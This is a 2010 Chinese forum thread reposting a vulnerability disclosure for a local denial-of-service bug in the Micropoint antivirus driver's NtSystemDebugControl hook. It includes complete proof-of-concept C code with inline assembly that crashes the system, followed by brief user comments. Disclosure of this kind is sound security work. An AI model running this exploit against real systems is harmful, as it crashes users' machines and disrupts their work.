» 游客:  注册 | 登录 | 帮助  微点交流论坛 » 主动防御 » 【已解决】360mj0011: 微点bsod_fun_2 NtSystemDebugControl Hook本地拒绝服务漏洞   作者: 标题: 【已解决】360mj0011: 微点bsod_fun_2 NtSystemDebugControl Hook本地拒绝服务漏洞 点饭的百度空间 银牌会员 积分 2315 发帖 2236 注册 2007-11-30 #1  【已解决】360mj0011: 微点bsod_fun_2 NtSystemDebugControl Hook本地拒绝服务漏洞 微点主动防御 mp110013.sys <= 1.3.10123.0 NtSystemDebugControl Hook 本地拒绝服务漏洞 2010-04-06 20:13 产品版本：微点主动防御：mp.100323.1.2.10581.0278.r1 文件版本：mp110013.sys 1.3.10123.0 timestamp:4BA1863F checksum 1e7b8 问题：没有正确处理NtSystemDebugControl WriteVirtual/WritePhysical 中的 Address/Buffer成员，引发拒绝服务漏洞 测试程序：http://mj0011.ys168.com 漏洞演示目录下 mpbsod_fun_2.rar,运行后系统即崩溃 typedef struct _SYSDBG_VIRTUAL {     PVOID Address;     PVOID Buffer;     ULONG Request; } SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL; int main(int argc, char* argv[]) { printf("Micropoint Local D.O.S Vulnerability\n"    "BSOD Micropoint for fun!\n"    "By MJ0011\nth_decoder$126.com\n\nPress Enter...\n"); getchar(); SYSDBG_VIRTUAL sbv ; sbv.Address = (PVOID)0x80000000; PVOID pAddr = GetProcAddress(GetModuleHandle("ntdll.dll") , "NtSystemDebugControl"); __asm {    push 0    push 0    push 0    lea eax , sbv    push eax    push 0xb    call pAddr } return 0; } [ Last edited by Legend on 2010-4-27 at 13:42 ] ※ ※ ※ 本文纯属【点饭的百度空间】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 你的微笑 is 微点的骄傲！ http://hi.baidu.com/new/micropoint 2010-4-6 20:23 snhao 银牌会员 积分 1791 发帖 1782 注册 2007-6-12 #2   呵，这个好。很久没看到MJ同志爆微点漏洞了，以为他不再关注微点了。 ※ ※ ※ 本文纯属【snhao】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 东方微点论坛 2010-4-7 12:56 snhao 银牌会员 积分 1791 发帖 1782 注册 2007-6-12 #3   微点要是想有所作为应该主动请求别人帮助寻找漏洞，而不是等别人来帮你找。 ※ ※ ※ 本文纯属【snhao】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 东方微点论坛 2010-4-7 13:06 饭桶小白 高级用户 积分 558 发帖 556 注册 2009-5-9 #4   怎么不见版主的呢？！ ※ ※ ※ 本文纯属【饭桶小白】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2010-4-7 14:44 王子的天下 禁止发言 积分 126 发帖 126 注册 2010-3-24 #5   教大家一招，开始—微点主动防御软件（Micropoint）— 卸载微点主动防御软件，完美过为微点 哈哈 ，你最牛。 ※ ※ ※ 本文纯属【王子的天下】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2010-4-8 03:30 市公司 新手上路 积分 43 发帖 43 注册 2010-4-5 #6   哎。。。。现在谁好谁坏不是辨别啊 ※ ※ ※ 本文纯属【市公司】个人意见，与【 微点交流论坛 】立场无关※ ※ ※ 2010-4-8 17:05 论坛跳转: 微点软件公测区 安全快报  > 病毒快报  > 漏洞快报 微点产品在线技术支持  > 微点主动防御软件  > 预升级反馈专区  > 微点杀毒软件 微点用户交流区  > 微点新闻  > 微点软件使用交流  > 微点茶室 安全技术交流区  > 主动防御  > 反病毒  > 防火墙 综合区  > 电脑&数码  > 体育&娱乐&休闲  > 灌水区 版务管理 内部使用专区  可打印版本 | 推荐 | 订阅 | 收藏 [ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司 闽ICP备05030815号